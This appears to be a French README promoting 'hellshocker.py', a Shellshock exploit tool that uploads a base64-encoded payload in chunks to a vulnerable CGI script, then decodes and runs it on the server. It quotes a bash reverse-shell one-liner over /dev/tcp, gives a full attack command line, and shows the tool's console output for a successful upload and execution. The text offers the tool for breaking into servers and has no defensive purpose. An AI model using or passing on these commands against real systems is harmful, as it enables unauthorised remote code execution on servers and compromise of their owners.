
Script d'exploitation Shellshock capable de télécharger et d'exécuter du code à distance (RCE) en utilisant n'importe quel vecteur grâce à sa polyvalence.
Fatigué d'utiliser des exploits Shellshock faibles ou simplement « /bin/bash >& /dev/tcp/IP/port 0>&1 » pour vous frayer un chemin dans le serveur ?
Oui, vous devez télécharger et exécuter quelque chose de plus complexe sur le serveur, et encoder en base64 un fichier énorme est impossible pour que votre requête HTTP soit acceptée par le serveur web.
Vos problèmes pourraient être résolus avec cet outil. Il est capable d'encoder votre payload en base64 et de l'envoyer par morceaux (par défaut 128 octets) au serveur web, puis, une fois envoyé, il le décode et l'exécute.
« Waouh », dites-vous, « Mais je n'ai pas PHP, il me faut quelque chose pour Java. » Pas de problème, dis-je, cet outil est hautement personnalisable.
Regardez plutôt :
python hellshocker.py --cgi http://website.com/cgi-bin/vulnerable --payload "java.jar" --destination "/tmp/java.jar" --trigger "/usr/bin/java -jar /tmp/java.jar" --base64
[*] Splitting data into chunks ...
[+] Payload data has been encoded to base64 format.
[*] There is 19 chunks to be sent to remote server
[*] Starting payload upload ...
[*] Uploading chunk #1
[*] Uploading chunk #2
[*] Uploading chunk #3
[*] Uploading chunk #4
[*] Uploading chunk #5
[*] Uploading chunk #6
[*] Uploading chunk #7
[*] Uploading chunk #8
[*] Uploading chunk #9
[*] Uploading chunk #10
[*] Uploading chunk #11
[*] Uploading chunk #12
[*] Uploading chunk #13
[*] Uploading chunk #14
[*] Uploading chunk #15
[*] Uploading chunk #16
[*] Uploading chunk #17
[*] Uploading chunk #18
[*] Uploading chunk #19
[+] Upload procedure has been completed.
[*] Decoding base64-encoded payload on remote server ...
[+] Remote command for decoding has been sent successfully sent.
[*] Triggering payload to execute ...
[+] Trigger command for payload execution has been succesfully sent.
Ensuite, votre payload a été transféré et exécuté avec succès. Sympa, non ? Oui, ça l'est.